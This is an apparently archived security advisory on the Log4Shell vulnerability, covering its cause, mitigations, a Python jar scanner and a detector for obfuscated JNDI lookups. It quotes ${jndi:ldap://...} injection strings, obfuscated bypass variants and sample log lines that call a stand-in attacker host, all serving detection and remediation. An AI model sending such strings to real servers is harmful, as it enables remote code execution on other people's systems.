URL: https://www.randori.com/blog/cve-2021-44228/
Submission: On December 16 via api from US — Scanned from DE



December 10, 2021
ASM, Recent Posts, Red Teaming, TTPs


CVE-2021-44228 – LOG4J 2 VULNERABILITY ANALYSIS


BY: RANDORI ATTACK TEAM



Last Update: 4:13pm EST, Dec. 14, 2021 (List of updates at bottom) 


WHAT IS LOG4SHELL?

Log4Shell is a critical severity vulnerability (CVE-2021-44228, CVSSv3 10.0)
impacting multiple versions of the Apache Log4j 2 logging library. It was
disclosed publicly via the project's GitHub on December 9, 2021. The
vulnerability, discovered by Chen Zhaojun of Alibaba Cloud Security Team,
affects Apache Log4j 2 versions 2.0-beta9 through 2.14.1.

The vulnerability allows for unauthenticated remote code execution. Log4j 2 is
an open source Java logging library developed by the Apache Software
Foundation. It is widely used directly by applications and, at least as often,
is pulled in as a transitive dependency by other libraries and services,
including enterprise applications and numerous cloud services.

Initially, there were mixed reports (GitHub, Original Post) as to the
susceptibility of Log4j 1.x. At this time, CVE-2021-4104 has been designated for
the impact to Log4j 1.x. According to Red Hat, remote code execution is possible
for some non-default configurations of software running Log4j 1.x (specifically
where the JMSAppender is configured; Log4j 1.x performs no lookup substitution
on log messages, so the 2.x attack path does not apply to it). Research by the
security community into the extent of the impact on Log4j 1.x is ongoing.

The Randori Attack Team has developed a working exploit and has been able to
successfully leverage this vulnerability in customer environments as part of our
offensive security platform. 

The vulnerability is reachable via a multitude of application-specific paths.
The root cause is that Log4j 2 performs lookup substitution on the text it
logs: a string of the form ${jndi:ldap://attacker-host/object} that reaches a
logging call is evaluated as a JNDI lookup, and the JVM connects to the
attacker's server and processes whatever it returns. Effectively, any scenario
in which a remote party can supply arbitrary data that an application logs
through Log4j 2 (HTTP headers such as User-Agent, form fields, usernames, URL
paths, or values forwarded from other systems) is susceptible to exploitation,
whether or not the entry is ever written to disk. This vulnerability is being
exploited in the wild and thousands of organizations are impacted. It poses a
significant and active real-world risk to affected systems – PLEASE TAKE
IMMEDIATE ACTION.

In analyzing CVE-2021-44228, Randori has determined the following:

 * Default installations of widely used enterprise software are vulnerable.
 * The vulnerability can be exploited reliably and without authentication.
 * The vulnerability affects multiple versions of Log4j 2 (2.0-beta9 through
   2.14.1).
 * The vulnerability allows for remote code execution as the user running the
   application that utilizes the library.
 * Upgrading the underlying version of Java alone is insufficient to prevent
   exploitation. Recent JDKs refuse to load classes from a remote LDAP codebase
   by default, but the lookup still connects to the attacker's server, and the
   returned JNDI reference or serialized object can be used to reach code
   execution through classes already present on the application's classpath.

This is an evolving situation; if you need help, please reach out. Due to the
severity of this issue, Randori is offering any enterprise a free Log4j attack
surface review. We are committed to helping the community not only understand
but respond quickly to this situation.


IMPACT

The Log4j 2 library is very frequently used in enterprise Java software,
typically bundled inside other products rather than installed on its own.
Because of this, the impact is difficult to quantify. As with other
high-profile vulnerabilities such as Heartbleed and Shellshock, we expect an
increasing number of vulnerable products to be identified in the weeks to come.

Due to the ease of exploitation and the breadth of applicability, we expect
ransomware actors to begin leveraging this vulnerability immediately.

(Figure not captured in this copy. Credit: Fastly [5])

RECOMMENDATION

Randori encourages all organizations to adopt an assumed-breach mentality and
review the logs of impacted applications for unusual activity.

If you find these hashes in your software inventory, you have the vulnerable
log4j-core library on your systems and need to take action:
https://github.com/mubix/CVE-2021-44228-Log4Shell-Hashes

If anomalies are found, we encourage you to assume this is an active incident,
that you have been compromised, and respond accordingly.

Upgrading to the patched versions of Log4j 2, or of the impacted applications
that bundle it, eliminates this vulnerability. Randori recommends that any
organization that believes it may be impacted update to a patched version
urgently.

In the latest update from the Apache Log4j team, they recommend organizations do
the following:

 * Upgrade to Log4j 2.16.0. (2.15.0 is still exploitable in non-default
   configurations where a pattern layout includes Thread Context Map values,
   such as %X, %mdc or %MDC, that are populated from user-supplied input.)
 * For those who cannot upgrade to 2.16.0:
   * In releases >= 2.10, this vulnerability can be mitigated by setting either
     the system property log4j2.formatMsgNoLookups or the environment variable
     LOG4J_FORMAT_MSG_NO_LOOKUPS to true.
   * For releases from 2.0-beta9 to 2.10.0, the mitigation is to remove
     the JndiLookup class from the classpath: zip -q -d log4j-core-*.jar
     org/apache/logging/log4j/core/lookup/JndiLookup.class

Note that the formatMsgNoLookups setting only stops lookups in the message
text; it does not cover the Thread Context Map case above. Removing
JndiLookup.class works on every affected version and is the more complete
in-place mitigation.

If patching is not possible, organizations are strongly advised to apply the
temporary mitigation below and monitor impacted applications closely for
anomalous behavior.

To mitigate the vulnerability in place of updating Log4j 2 (releases 2.10 and
later), set the following system property to true when starting the Java
Virtual Machine, for example:

java -Dlog4j2.formatMsgNoLookups=true -jar application.jar

The property must be present on the command line of every JVM that loads the
library; it has no effect on a process that is already running.

The presence of JAR files belonging to the log4j library can indicate that an
application is potentially susceptible to CVE-2021-44228. The specific files to
search for should match the following pattern:

log4j-core-*.jar

Depending on the installation method, the location of the matching JAR file may
also indicate which application is potentially vulnerable. For example, on
Windows, if the file is located in C:\Program
Files\ApplicationName\log4j-core-version.jar, then ApplicationName should be
investigated. On Linux, the lsof utility can show which processes currently
have the JAR file open and can be run via the following syntax:

lsof /path/to/log4j-core-version.jar

A filename search misses copies of log4j-core that have been repackaged inside
an application's own JAR, WAR or EAR (shaded or "fat" archives). For those,
list the archive contents and look for
org/apache/logging/log4j/core/lookup/JndiLookup.class directly.
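The inventory-and-mitigation procedure above (find log4j-core-*.jar files, read the version, decide whether the Apache mitigation of removing JndiLookup.class applies, and apply it) as one script. This is an added example written for this page, not Randori's tooling or code from the Log4j project. The directory tree it scans is a constructed fixture of empty stand-in jars built in a temporary directory, and the status names (vulnerable, partially-fixed, mitigated, patched, not-affected) are this example's own labels.

```python
import os
import re
import shutil
import tempfile
import zipfile

# Path of the class that implements the ${jndi:...} lookup inside log4j-core.
JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
# Matches log4j-core-2.14.1.jar, log4j-core-2.0-beta9.jar, log4j-core-2.0-rc1.jar
JAR_NAME = re.compile(r"^log4j-core-(\d+\.\d+(?:\.\d+)?(?:-(?:beta|rc)\d+)?)\.jar$")
VERSION = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?(?:-(beta|rc)(\d+))?$")


def parse_version(text):
    """'2.14.1' -> (2, 14, 1, (0, 0)); beta and rc builds sort below the final."""
    m = VERSION.match(text)
    if not m:
        return None
    pre = (0, 0) if m.group(4) is None else ({"beta": -2, "rc": -1}[m.group(4)], int(m.group(5)))
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0), pre)


def classify(version, has_jndi_lookup):
    """Status of one log4j-core jar from its version and whether JndiLookup.class is in it."""
    v = parse_version(version)
    if v is None:
        return "unknown-version"
    if v < parse_version("2.0-beta9"):
        return "not-affected"        # Log4j 1.x is a separate issue (CVE-2021-4104)
    if v >= parse_version("2.16.0"):
        return "patched"
    if not has_jndi_lookup:
        return "mitigated"           # someone already ran `zip -q -d ... JndiLookup.class`
    if v >= parse_version("2.15.0"):
        return "partially-fixed"     # 2.15.0: still exploitable via Thread Context Map patterns
    return "vulnerable"


def find_log4j_core_jars(root):
    """Walk root and return [(path, version)] for every log4j-core-*.jar found by name."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            m = JAR_NAME.match(name)
            if m:
                hits.append((os.path.join(dirpath, name), m.group(1)))
    return sorted(hits)


def jar_has_jndi_lookup(path):
    with zipfile.ZipFile(path) as zf:
        return JNDI_LOOKUP in zf.namelist()


def strip_jndi_lookup(path):
    """Rewrite the jar without JndiLookup.class (the effect of `zip -q -d`).
    Returns True if the class was present and has been removed."""
    tmp = path + ".tmp"
    with zipfile.ZipFile(path) as src:
        if JNDI_LOOKUP not in src.namelist():
            return False
        with zipfile.ZipFile(tmp, "w") as dst:
            for info in src.infolist():
                if info.filename != JNDI_LOOKUP:
                    dst.writestr(info, src.read(info.filename))
    os.replace(tmp, path)   # atomic swap; a running JVM keeps the old class until restarted
    return True


def scan(root):
    """{jar path: status} for every log4j-core jar under root."""
    return {path: classify(ver, jar_has_jndi_lookup(path))
            for path, ver in find_log4j_core_jars(root)}


def build_sample_tree(root):
    """Constructed fixture (not real software): stand-in jars carrying only the
    entry names this scanner looks at."""
    samples = {                                     # relative path -> contains JndiLookup.class?
        "app1/lib/log4j-core-2.14.1.jar": True,
        "app2/WEB-INF/lib/log4j-core-2.0-beta9.jar": True,
        "app3/lib/log4j-core-2.16.0.jar": True,     # JNDI disabled by default in 2.16
        "app4/lib/log4j-core-2.12.1.jar": False,    # class already removed by an operator
        "app5/lib/log4j-api-2.14.1.jar": False,     # not log4j-core; must be ignored
    }
    for rel, with_jndi in samples.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with zipfile.ZipFile(full, "w") as zf:
            zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
            zf.writestr("org/apache/logging/log4j/core/Logger.class", b"\xca\xfe\xba\xbe")
            if with_jndi:
                zf.writestr(JNDI_LOOKUP, b"\xca\xfe\xba\xbe")


def demo():
    """Scan the fixture, strip JndiLookup.class from exploitable jars, rescan.
    Returns {relative jar path: (status before, status after)}."""
    root = tempfile.mkdtemp(prefix="log4j-scan-")
    try:
        build_sample_tree(root)
        before = scan(root)
        for path, status in before.items():
            if status in ("vulnerable", "partially-fixed"):
                strip_jndi_lookup(path)
        after = scan(root)
        return {os.path.relpath(p, root).replace(os.sep, "/"): (before[p], after[p])
                for p in before}
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    for jar, (was, now) in demo().items():
        print(f"{jar}: {was} -> {now}")
```

Against a real host, call scan("/opt") (or the application root) and strip_jndi_lookup on the jars it reports as vulnerable or partially-fixed, then restart the affected JVMs, since a process that already loaded the jar keeps the old class in memory. The scanner matches only the standalone jar name; log4j-core classes repackaged inside an application's own JAR, WAR or EAR are not found by this pass and need the archive-contents check described above.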

Currently, detection guidance in the form of regular-expression signatures in
the public space appears to be overly broad, and bypasses have surfaced to
circumvent it. Because Log4j evaluates lookups recursively, an attacker can
rewrite ${jndi: as, for example, ${${lower:j}ndi: or
${${::-j}${::-n}${::-d}${::-i}:, which produces the same lookup at runtime.
Signatures that match only the literal string ${jndi: miss these variants,
while signatures broad enough to catch every ${ are noisy.
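To make the bypass problem concrete, the following detector flattens nested lookups before matching, so that the obfuscated forms resolve to the same ${jndi: prefix a naive signature expects. This is an added example, not Randori's detection logic or Log4j's own substitution code: resolve_lookup is a simplified model of the lookup syntax (lower, upper, quoted date literals and the :- default value) rather than a faithful re-implementation, and SAMPLE_LOG is a set of constructed web-server log lines, not captured traffic.

```python
import re
from urllib.parse import unquote

# What most public signatures look for: the literal lookup prefix.
NAIVE = re.compile(r"\$\{jndi:", re.IGNORECASE)
# One innermost ${...} lookup: a body with no further $, { or } inside it.
LOOKUP = re.compile(r"\$\{([^${}]*)\}")

# Constructed sample lines (Apache combined log format), not captured traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:13:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [10/Dec/2021:13:01:07 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.10:1389/a}"',
    '10.0.0.8 - - [10/Dec/2021:13:01:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}dap://203.0.113.10:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:13:01:11 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://203.0.113.10:1389/a}"',
    '10.0.0.10 - - [10/Dec/2021:13:01:13 +0000] "GET /?x=%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.10%3A1389%2Fa%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '10.0.0.11 - - [10/Dec/2021:13:01:15 +0000] "GET / HTTP/1.1" 200 512 "-" "${env:HOME} ${sys:java.version} price ${upper:usd}"',
]


def resolve_lookup(body):
    """Approximate one innermost Log4j 2 lookup. Only the lookups attackers use
    for obfuscation are modelled; anything else resolves to an empty string."""
    name, _, arg = body.partition(":")
    name = name.lower()
    if name == "lower":
        return arg.lower()                               # ${lower:J} -> j
    if name == "upper":
        return arg.upper()                               # ${upper:n} -> N
    if name == "date":
        return "".join(re.findall(r"'([^']*)'", arg))    # ${date:'j'} -> j (quoted literal)
    if ":-" in body:
        return body.split(":-", 1)[1]                    # ${::-j}, ${env:NOPE:-j} -> j (default)
    return ""                                            # ${env:HOME}, ${sys:...}: unknown offline


def normalize(text, max_rounds=32):
    """Flatten nested lookups innermost-first, as Log4j's substitution does,
    but keep any ${jndi:...} lookup intact so the signature can match it."""
    marker = "\x00{"   # temporary stand-in for the '${' of a jndi lookup

    def repl(m):
        body = m.group(1)
        if body.lower().startswith("jndi:"):
            return marker + body + "}"
        return resolve_lookup(body)

    for _ in range(max_rounds):
        new = LOOKUP.sub(repl, text)
        if new == text:
            break
        text = new
    return text.replace(marker, "${")


def is_jndi_probe(line):
    """True if the line carries a ${jndi:...} lookup once URL-decoded and flattened."""
    return NAIVE.search(normalize(unquote(line))) is not None


def naive_hits(lines):
    """Indices flagged by the literal signature alone."""
    return [i for i, line in enumerate(lines) if NAIVE.search(line)]


def jndi_hits(lines):
    """Indices flagged after decoding and flattening."""
    return [i for i, line in enumerate(lines) if is_jndi_probe(line)]


if __name__ == "__main__":
    print("naive signature:", naive_hits(SAMPLE_LOG))
    print("normalized     :", jndi_hits(SAMPLE_LOG))
```

On the sample, the literal signature reports only the second line, while the normalized check also catches the lower-case, default-value and URL-encoded variants and leaves the benign ${env:...} line alone. A single URL-decoding pass is used here; double-encoded payloads would need another. The practical conclusion matches the mitigation section: treat a hit as a reason to hunt, not as proof of compromise, and rely on the patched version or the JndiLookup removal for actual protection rather than on a signature.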

Updates to this post:

 1.  Added the list of hashes of vulnerable log4j-core JARs:
     https://github.com/mubix/CVE-2021-44228-Log4Shell-Hashes
 2.  Added guidance on searching for files matching "log4j-core-*.jar".
 3.  Added guidance on using the JAR file location and lsof to identify which
     application is potentially vulnerable.
 4.  Added a note that public regular-expression detection signatures are
     overly broad and have known bypasses.
 5.  This issue was discovered by Chen Zhaojun of Alibaba Cloud Security Team.
 6.  Added to Further Information:
     https://logging.apache.org/log4j/2.x/security.html
 7.  Details regarding exploitability of VMware products impacted by
     VMSA-2021-0028
 8.  Additional details on VMware mitigations (Full details)
 9.  Additional details on Jamf mitigations (Full details)
 10. Remediation and mitigation guidance from Apache Foundation (Link)
 11. Updated with clarification that version 1.x of Log4j is not susceptible to
     this vulnerability (Link)
 12. Updated with clarification that remote code execution is possible for some
     non-default configurations of software running Log4j 1.x (Link)
 13. Updated to reflect Randori's position that updating your version of Java
     is not sufficient to prevent exploitation of the vulnerability.


ADDITIONAL LOG4J CONTENT & RESEARCH FROM RANDORI

 * Log4Shell – What You Need to Know
 * VMSA-2021-0028: VMware Impact & Remediation Analysis
 * Jamf Pro: Log4Shell Impact & Remediation Analysis


FURTHER INFORMATION

[1] https://news.ycombinator.com/item?id=29504755

[2] https://github.com/apache/logging-log4j2/pull/608

[3] https://logging.apache.org/log4j/2.x/security.html

[4] https://www.vmware.com/security/advisories/VMSA-2021-0028.html

[5] https://www.fastly.com/blog/digging-deeper-into-log4shell-0day-rce-exploit-found-in-log4j

[6] https://access.redhat.com/security/cve/CVE-2021-4104

